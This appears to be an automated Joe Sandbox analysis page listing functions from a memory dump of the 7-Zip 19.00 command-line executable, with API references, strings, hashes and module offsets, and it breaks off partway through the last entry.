Opcode ID: ca853514d698da322178c764a93f6451d2681f45a97f5268fbff0ab336d04f61
Instruction ID: 3852c3ccf83ab7f16886da889bdd108ad7903d275ad0b4dff3928a7eb10933e0
Opcode Fuzzy Hash: ca853514d698da322178c764a93f6451d2681f45a97f5268fbff0ab336d04f61
Instruction Fuzzy Hash: 76511833712A8089CB25EF36D4A466D6324FBC6F99B598176DF1E1B728CF24C905C320

Function 009AD998 Relevance: 21.2, APIs: 13, Strings: 1, Instructions: 197COMMON

Download Yara Rule

APIs

Part of subcall function 00974D78: free.MSVCRT ref: 00974DBC
Part of subcall function 00974D78: free.MSVCRT ref: 00974DC4
Part of subcall function 00974D78: free.MSVCRT ref: 00974EAC

free.MSVCRT ref: 009ADAAC
free.MSVCRT ref: 009ADAB4
free.MSVCRT ref: 009ADAC2
free.MSVCRT ref: 009ADAF0
free.MSVCRT ref: 009ADAF8
free.MSVCRT ref: 009ADB06
free.MSVCRT ref: 009ADBB6
free.MSVCRT ref: 009ADBE9
free.MSVCRT ref: 009ADBF1
free.MSVCRT ref: 009ADBFF
free.MSVCRT ref: 009ADC2D
free.MSVCRT ref: 009ADC35
free.MSVCRT ref: 009ADC43

Part of subcall function 00974338: wcscmp.MSVCRT ref: 00974345

Strings

..\, xrefs: 009ADB27

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: free$wcscmp
String ID: ..\
API String ID: 4021281200-2756224523
Opcode ID: 7888456042c53789908d25aad9b3813a7becaf42d114683dbdf658571ea549be
Instruction ID: a230fcb747ee44d31d4a5a4cc26693949363821dc08be4de8b2ea5b22a73226c
Opcode Fuzzy Hash: 7888456042c53789908d25aad9b3813a7becaf42d114683dbdf658571ea549be
Instruction Fuzzy Hash: 4D617023715A8086CA20EF16E49135EB324FBD6B94F998121EF4E1BB69DF78C802C750

Function 009B0B2C Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 71COMMON

Download Yara Rule

APIs

fputs.MSVCRT ref: 009B0B57
fputs.MSVCRT ref: 009B0B67

Part of subcall function 00972568: free.MSVCRT ref: 009725B5
Part of subcall function 00972568: free.MSVCRT ref: 009725C0

Part of subcall function 00972300: fputc.MSVCRT ref: 00972311

fputs.MSVCRT ref: 009B0BB4
fputs.MSVCRT ref: 009B0BC4
fputs.MSVCRT ref: 009B0BD0
free.MSVCRT ref: 009B0BE4
fputs.MSVCRT ref: 009B0C0C
fputs.MSVCRT ref: 009B0C1C
fputs.MSVCRT ref: 009B0C2A

Strings

Path: , xrefs: 009B0B60
Modified: , xrefs: 009B0C15
Size: , xrefs: 009B0BBD

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: fputs$free$fputc
String ID: Modified: $Path: $Size:
API String ID: 2662072562-3207571042
Opcode ID: baf16f6fc6d4a04671d563c07444ec4426631ca8bc597a177c284f797b747402
Instruction ID: 607a487e13f942e5ae46b5e82ad3848e4e2847aa96ce312b3a66923c44c802ff
Opcode Fuzzy Hash: baf16f6fc6d4a04671d563c07444ec4426631ca8bc597a177c284f797b747402
Instruction Fuzzy Hash: 8221F16631491191DE10EB25FE6476E2321FBD5FF8F44D222EE6E476A5DF28C519C300

Function 0097BF04 Relevance: 20.3, APIs: 16, Instructions: 327COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 0097BF55
free.MSVCRT ref: 0097BF5D
free.MSVCRT ref: 0097BF93
free.MSVCRT ref: 0097BF9B
free.MSVCRT ref: 0097BFF4
free.MSVCRT ref: 0097C1DC
free.MSVCRT ref: 0097C1F6
free.MSVCRT ref: 0097C210
free.MSVCRT ref: 0097C22A
free.MSVCRT ref: 0097C1A5

Part of subcall function 00972D34: free.MSVCRT ref: 00972D77

free.MSVCRT ref: 0097C1C2
free.MSVCRT ref: 0097C237
free.MSVCRT ref: 0097C248
free.MSVCRT ref: 0097C253
free.MSVCRT ref: 0097C3AF
free.MSVCRT ref: 0097C3BD

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 73dc987ccbc96a76fd053137d80cd1e85e68fdadf62f71c117497fccd2584006
Instruction ID: fd749e4af34a5e4d5381158ef451a2b83bce1ad36a979ea55a3cae8a894824f2
Opcode Fuzzy Hash: 73dc987ccbc96a76fd053137d80cd1e85e68fdadf62f71c117497fccd2584006
Instruction Fuzzy Hash: 3DC1856331898092CB20EF25E49026EA770F7C5B90F94C526EB4E67B69DF39CD85CB41

Function 00980998 Relevance: 19.6, APIs: 12, Strings: 1, Instructions: 133COMMON

Download Yara Rule

APIs

memmove.MSVCRT ref: 009809CE
memmove.MSVCRT ref: 009809E7
memmove.MSVCRT ref: 00980A00
_CxxThrowException.MSVCRT ref: 00980B70
free.MSVCRT ref: 00980B7E
free.MSVCRT ref: 00980B8B
free.MSVCRT ref: 00980B98
free.MSVCRT ref: 00980BA5
free.MSVCRT ref: 00980BB2
free.MSVCRT ref: 00980BBC
free.MSVCRT ref: 00980BC6
free.MSVCRT ref: 00980BD0

Strings

Incorrect volume size:, xrefs: 00980B53

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: free$memmove$ExceptionThrow
String ID: Incorrect volume size:
API String ID: 3957182552-1799541332
Opcode ID: 4436e24a10e8fc572d61ba3777d2b135a9ae8f78e93ce841be10de43e0223506
Instruction ID: 484e4303f3b1ad139db6fc4957144bf1cb570573997217473b018b602f117452
Opcode Fuzzy Hash: 4436e24a10e8fc572d61ba3777d2b135a9ae8f78e93ce841be10de43e0223506
Instruction Fuzzy Hash: F6517B73214A8496DF64EF26E8903EDB320F7C5B84F848122EB9D477A5DF28C999C750

Function 00987178 Relevance: 19.0, APIs: 15, Instructions: 200COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 009871FD

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: c96e70f305775fe2be644aefe5c3f32861bae157b673a4b6227a1bbf3ac5cc1e
Instruction ID: 96835287cf1bfc1fbd756c88230d3021a65ab1a56804c035d46da13ea13588d1
Opcode Fuzzy Hash: c96e70f305775fe2be644aefe5c3f32861bae157b673a4b6227a1bbf3ac5cc1e
Instruction Fuzzy Hash: A4716C2321CA4081DB20EF66E8503ADA765FBC5BD4F548122AF9E87775DF38C896C350

Function 0097A8A0 Relevance: 18.2, APIs: 10, Strings: 2, Instructions: 162COMMON

Download Yara Rule

APIs

Part of subcall function 0097339C: free.MSVCRT ref: 009733D7
Part of subcall function 0097339C: memmove.MSVCRT(00000000,?,?,00000000,009710A8), ref: 009733F2

free.MSVCRT ref: 0097A90A
free.MSVCRT ref: 0097A9AD

Strings

/, xrefs: 0097AA22
\, xrefs: 0097AA1B

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: free$memmove
String ID: /$\
API String ID: 1534225298-1600464054
Opcode ID: f198c9d99514ce9e4ce6b0316728f7062312fdaa462ade4dde103b6963418a90
Instruction ID: 1ddaa96052e5a65c698152bec8c028fac5593f9fdfd7cf67a0bfde2be99fe0e5
Opcode Fuzzy Hash: f198c9d99514ce9e4ce6b0316728f7062312fdaa462ade4dde103b6963418a90
Instruction Fuzzy Hash: F551C813218640A0CE28FF22D5512BE6735FBD27D4B84D121FB9E4776ADF28C946DB02

Function 009B85C7 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 58COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 009B85DA
free.MSVCRT ref: 009B85E2
memmove.MSVCRT ref: 009B8602
fputs.MSVCRT ref: 009B8637
fputs.MSVCRT ref: 009B8647
free.MSVCRT ref: 009B867B
free.MSVCRT ref: 009B8683
free.MSVCRT ref: 009B8695

Strings

Usage: 7z <command> [<switches>...] <archive_name> [<file_names>...] [@listfile]<Commands> a : Add files to archive b : Benchmark d : Delete files from archive e : Extract files from archive (without using directory names) h : Calculate hash values, xrefs: 009B8640
7-Zip 19.00 (x64) : Copyright (c) 1999-2018 Igor Pavlov : 2019-02-21, xrefs: 009B8630

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: free$fputs$memmove
String ID: 7-Zip 19.00 (x64) : Copyright (c) 1999-2018 Igor Pavlov : 2019-02-21$Usage: 7z <command> [<switches>...] <archive_name> [<file_names>...] [@listfile]<Commands> a : Add files to archive b : Benchmark d : Delete files from archive e : Extract files from archive (without using directory names) h : Calculate hash values
API String ID: 2337578458-4238946813
Opcode ID: fc1f1692e1a7be690a265933f0a82059642291962d2ae098a8720eef4c07a75c
Instruction ID: efc0a9aaa3103bd00091fc680c8cca9e98bc67e1b118a4b77a8e81e17960ef77
Opcode Fuzzy Hash: fc1f1692e1a7be690a265933f0a82059642291962d2ae098a8720eef4c07a75c
Instruction Fuzzy Hash: FB115E637156C086DA20DF15EA903AEB326F7C9BE4F548022CB5E17719CF38C896C711

Function 0097FEC8 Relevance: 16.6, APIs: 8, Strings: 3, Instructions: 146COMMON

Download Yara Rule

APIs

Part of subcall function 00978624: free.MSVCRT ref: 009786A9

_CxxThrowException.MSVCRT ref: 0097FF2F
free.MSVCRT ref: 0097FFAE
_CxxThrowException.MSVCRT ref: 0097FFD1
_CxxThrowException.MSVCRT ref: 0097FFF7
_CxxThrowException.MSVCRT ref: 0098002B
free.MSVCRT ref: 009800DF
free.MSVCRT ref: 009800E7
free.MSVCRT ref: 009800F5

Strings

Incorrect item in listfile.Check charset encoding and -scs switch., xrefs: 0097FFDA, 0098000E
The file operation error for listfile, xrefs: 0097FF71
Cannot find listfile, xrefs: 0097FF12

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: free$ExceptionThrow
String ID: Cannot find listfile$Incorrect item in listfile.Check charset encoding and -scs switch.$The file operation error for listfile
API String ID: 4001284683-1604901869
Opcode ID: 96405dd8fb92279f030b02bc931f9dc36b9c89402a3ea1ebc254a3a14f5713aa
Instruction ID: d743e9ea351525b0fb0439dacfb2439f612dd6dfe038c2ced2c9cd455837c4a7
Opcode Fuzzy Hash: 96405dd8fb92279f030b02bc931f9dc36b9c89402a3ea1ebc254a3a14f5713aa
Instruction Fuzzy Hash: 5D51AE7331868596CA20EF16E8907AEB721F7D57D4F904116EF9D13B6ADF68C90ACB00

Function 00977524 Relevance: 16.4, APIs: 13, Instructions: 153COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 0097756F
SetLastError.KERNEL32 ref: 0097758E
free.MSVCRT ref: 0097759A

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: free$ErrorLast
String ID:
API String ID: 408039514-0
Opcode ID: 56e310f5247428a7174e856c66c809f8f157f3f47fc266d476a18a669d8f27e7
Instruction ID: 3f81bcb19fa7050cca797cfd9bb164cb7249fe72ca91fa0da9b7f60dbb7c3eb1
Opcode Fuzzy Hash: 56e310f5247428a7174e856c66c809f8f157f3f47fc266d476a18a669d8f27e7
Instruction Fuzzy Hash: B6517A2322C90092DA20EF65E49176EE760FBD5794F909222F79E436B9DF68CD47CB10

Function 009B3148 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 52COMMON

Download Yara Rule

APIs

fputs.MSVCRT ref: 009B3184
fputs.MSVCRT ref: 009B3194
fputs.MSVCRT ref: 009B31E1
fputs.MSVCRT ref: 009B31F1

Strings

ERRORS:, xrefs: 009B3164
ERROR, xrefs: 009B317D
= , xrefs: 009B318D, 009B31EA
WARNINGS:, xrefs: 009B31BE
WARNING, xrefs: 009B31DA

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: fputs
String ID: = $ERROR$ERRORS:$WARNING$WARNINGS:
API String ID: 1795875747-2836439314
Opcode ID: bfaef9fa8df0d205eec04fe16e9a27ef95300a9a3da73fd13572728b12155a0b
Instruction ID: 23479dfe978b47423624f13a3e2e267cd2f7ffe9f99db87620bad2e9ddf6a347
Opcode Fuzzy Hash: bfaef9fa8df0d205eec04fe16e9a27ef95300a9a3da73fd13572728b12155a0b
Instruction Fuzzy Hash: 5611BEA670054096FB24DF2AEA987987720F748BE4F44C022CF4903A62DF38DAA8C300

Function 009B65D0 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 46COMMON

Download Yara Rule

APIs

fputs.MSVCRT ref: 009B65F8
fputs.MSVCRT ref: 009B6604
fputs.MSVCRT ref: 009B6614

Part of subcall function 009B6460: fputs.MSVCRT ref: 009B64B3

fputs.MSVCRT ref: 009B6643
fputs.MSVCRT ref: 009B6674
free.MSVCRT ref: 009B6680

Strings

MB, xrefs: 009B663C
, xrefs: 009B65F1
Memory =, xrefs: 009B660D

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: fputs$free
String ID: $ MB$ Memory =
API String ID: 3873070119-2616823926
Opcode ID: 07695d8419c59f003fa7f84926a4645375bf0ceb04becd9a3de262dbf0bc1305
Instruction ID: 7a929cec14aaf4a1416b77334c361d7bf8f85dd0f0545f40820ac0e95cb6ebd7
Opcode Fuzzy Hash: 07695d8419c59f003fa7f84926a4645375bf0ceb04becd9a3de262dbf0bc1305
Instruction Fuzzy Hash: 4A11EFA265490191EB109F29FD5435A3321F784BE5F44D222EA6E437A5DF38C555C700

Function 009B30CC Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 32COMMON

Download Yara Rule

APIs

fputs.MSVCRT ref: 009B30E7
fputs.MSVCRT ref: 009B3104
fputs.MSVCRT ref: 009B3114

Part of subcall function 00972320: free.MSVCRT ref: 0097237E
Part of subcall function 00972320: fputs.MSVCRT ref: 009723B8
Part of subcall function 00972320: free.MSVCRT ref: 009723C4

fputs.MSVCRT ref: 009B3132

Strings

: Can not open the file as [, xrefs: 009B310D
ERROR, xrefs: 009B30F7
Open , xrefs: 009B30DD
] archive, xrefs: 009B3125
WARNING, xrefs: 009B30F0

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: fputs$free
String ID: : Can not open the file as [$ERROR$Open $WARNING$] archive
API String ID: 3873070119-2741933734
Opcode ID: f32defa99fa0ddd8f5ee8d7903e4695ca461ad93e2af0abed86e02622ffafdb7
Instruction ID: 242ddffd7f437842f222241ac4dd648cc55cff84732719423735c4951f196a47
Opcode Fuzzy Hash: f32defa99fa0ddd8f5ee8d7903e4695ca461ad93e2af0abed86e02622ffafdb7
Instruction Fuzzy Hash: 14F037A6740A0591FE109B6AFDA87997361BB99FD4F84D022DE5E033629F2CC949C300

Function 009AEE5C Relevance: 15.3, APIs: 12, Instructions: 344COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 009AEFB0

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: c6c1dfda41fa0d06ad42f95544832c1263e566194fcfacdfad1f80fd41ef587c
Instruction ID: 5f33fb62ffa78d58b4cbaa05b447574121daf54f113140f336ff20be3dd29501
Opcode Fuzzy Hash: c6c1dfda41fa0d06ad42f95544832c1263e566194fcfacdfad1f80fd41ef587c
Instruction Fuzzy Hash: 17E17936325B8096CB64DF26E4A476E77A4F78AB84F548422EB8E43725DF38C855C780

Function 00976F50 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 116threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00976F6D
GetTickCount.KERNEL32 ref: 00976F78
GetCurrentProcessId.KERNEL32 ref: 00976F85

Part of subcall function 0097339C: free.MSVCRT ref: 009733D7
Part of subcall function 0097339C: memmove.MSVCRT(00000000,?,?,00000000,009710A8), ref: 009733F2

GetTickCount.KERNEL32 ref: 00977023
SetLastError.KERNEL32 ref: 0097705C
GetLastError.KERNEL32 ref: 00977086

Part of subcall function 00976C84: CreateDirectoryW.KERNEL32 ref: 00976CA8

Strings

d, xrefs: 0097709B
.tmp, xrefs: 0097703B

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: CountCurrentErrorLastTick$CreateDirectoryProcessThreadfreememmove
String ID: .tmp$d
API String ID: 3444860307-2797371523
Opcode ID: 855db8f89ad4192e1f7aaf537696d0c704f64e19782212e671a724ccd2b912be
Instruction ID: 7527e386fe5b5a2ed241510d2ce46c7cc183efa8a1b67e566c2be7ac8a1315dd
Opcode Fuzzy Hash: 855db8f89ad4192e1f7aaf537696d0c704f64e19782212e671a724ccd2b912be
Instruction Fuzzy Hash: 80314227218250D6DB24AB66F85076DF361BB90BC4F44C522DF8A47B21DB38C882C701

Function 00976B2C Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 87libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00976B4F
GetProcAddress.KERNEL32 ref: 00976B5F
free.MSVCRT ref: 00976C0C
free.MSVCRT ref: 00976C17
free.MSVCRT ref: 00976C25
free.MSVCRT ref: 00976C30

Strings

CreateHardLinkW, xrefs: 00976B58
kernel32.dll, xrefs: 00976B48

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: free$AddressHandleModuleProc
String ID: CreateHardLinkW$kernel32.dll
API String ID: 399046674-294928789
Opcode ID: 0711bf2b160802de48a7ad8e62ea8a456af0d095c717e74070ad8e7392e23327
Instruction ID: 86a06abfc9834b5f6d865dc9a3afd8545d14f68ff04d6c1fd1ed8d06793ef33d
Opcode Fuzzy Hash: 0711bf2b160802de48a7ad8e62ea8a456af0d095c717e74070ad8e7392e23327
Instruction Fuzzy Hash: AA21C72331994051DE61EB26EC527AF6714EBC37E0F889235BEAE87765DE28CC46C610

Function 0097DEBC Relevance: 13.9, APIs: 11, Instructions: 168COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 0097DF01
free.MSVCRT ref: 0097DFEC
free.MSVCRT ref: 0097E051
free.MSVCRT ref: 0097E05C
free.MSVCRT ref: 0097E072
free.MSVCRT ref: 0097E07D
free.MSVCRT ref: 0097E0A1
free.MSVCRT ref: 0097E0A9
free.MSVCRT ref: 0097E0D2
free.MSVCRT ref: 0097E0DA
free.MSVCRT ref: 0097E0E9

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 4a8c016d17941940ccb69cce4f22d951ccabf5595733c0ae8ca37ad45cd0dd66
Instruction ID: a5855f53545ea30505d1c6b38627b8e0e37cc9f648fa0b9e1c2c65b6ef8b2e01
Opcode Fuzzy Hash: 4a8c016d17941940ccb69cce4f22d951ccabf5595733c0ae8ca37ad45cd0dd66
Instruction Fuzzy Hash: 2251A623229A4095CA21EF26E85026B7770FBC9BE4B988225FF5E47765EF38C542C700

Function 00982C58 Relevance: 13.6, APIs: 9, Instructions: 127COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00982DC0
free.MSVCRT ref: 00982DC8
free.MSVCRT ref: 00982DD9

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_970000_7z.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 4f627721fd3f548a9e12361352d12e7f0c520e4151b4dacedd918d3c46c14af4
Instruction ID: 767c6478416cc6cdbf0e5ed69e5abc44368157e9bf721227b6d26d693850bc4b
Opcode Fuzzy Hash: 4f627721fd3f548a9e12361352d12e7f0c520e4151b4dacedd918d3c46c14af4
Instruction Fuzzy Hash: 5941703361898086CB70BF16E88026D6B65F7857A4F994236EE5E17B95DB38C882C740

Function 009A5988 Relevance: 12.7, APIs: 10, Instructions: 233COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true

Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
